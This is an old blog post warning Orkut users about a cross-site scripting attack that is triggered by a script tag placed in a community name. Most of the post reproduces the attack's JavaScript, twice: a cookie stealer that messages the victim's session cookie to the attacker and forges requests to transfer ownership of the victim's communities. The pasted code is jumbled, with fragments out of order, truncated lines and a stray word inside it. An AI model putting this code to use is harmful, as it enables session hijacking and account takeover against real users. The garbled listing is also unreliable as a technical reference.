Monday, February 18, 2008

Exploit on Orkut

Exploit on Orkut
There is yet another exploit on Orkut(the Google affiliated Social Networking Service), and this exploit can easily be made use of to obtain ownership of someone else's community, with just a click on a community link. Name the community with:
< script scr="...URL...">
where URL points to the location where the below JavaScript is stored. Once someone clicks on a community having such has such a name, the script at that URL gets executed, and their community ownership is transferred to the person with the user ID xxxxxxxxxxxxxxxxxxxx (see below) which is the person's 20 digit User ID to whom your ownership gets transferred to. I just lost onwership to my "**********" community. So, BEWARE of this exploit and NEVER EVER CLICK on any community or profile with a name such as:
< script scr="...URL...">

The JavaScript exploit code is as below: (comments are in Portuguese, which I don't know a thing about, and neither am I a JavaScript expert, so I let you understand this script by yourself).

var uid="xxxxxxxxxxxxxxxxxxxx"; //
//window.alert('injetado');

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
}
else
{
mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
}
check_scraps();
};
getCookies();

function velocity_transfer()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,
Hack
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/Compose.aspx',true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
function check_scraps()
{
x=0;
var xml=createXMLHttpRequest();
xml.open("GET","Scrapbook.aspx",true);
xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlr1=xml.responseText;
if(!xmlr1.indexOf('textPanel') > -1)
{
SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
send_message();
}
else
{
check_scraps();
}
};
};
xml.send(null);
};

this is how it will act and ur comms will get transfered.
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
if(!xmlrtr.match(/textPanel/gi))
{
array_cmm();
}
else
{
send_message();
}
}
};
};
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
cmm=cmm.split(',');
if(cmm)
{
velocity_transfer();
}
}
else
{
array_cmm();
};
};
};
xml2.send(null);
};

function send_message()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x{
velocity_transfer();
}
}
};
};

function array_cmm()
{
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{ 12:00 AM
1/21/2007


νινєк:
the script which will be executed by that posted javascript is like


Var uid="7911771698884038554";

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nOrkut Community Transfer & Cookie Stealer Exploit\nDesenvolvido por Rodrigo Lacerda";
}
else
{
mensagem = "This user uses Internet Explorer and the function failed to pick up cookies, make sure it sent some comundiade \ n \ nOrkut Community Transfer & Cookie Stealer Exploit \ by Rodrigo Lacerda";
}
check_scraps();
};
getCookies();

function velocity_transfer()

All Community owners, beware of a sneaky new phishing link going around. The link seems to lead to an Orkut community, but actually transfers ownership of your communities to some other profile.

More info here:
orkut-cookie-exploit-anyone-can-steal.html" target="_blank">http://technowise.blogspot.com/2006/12/orkut-cookie-exploit-anyone-can-steal.html

Do not click on any community or profile links which look like < script scr="...URL...">

A couple of communities have been lost already, namely the 'C' and the 'C/C++ programmers India' communities. So please watch out!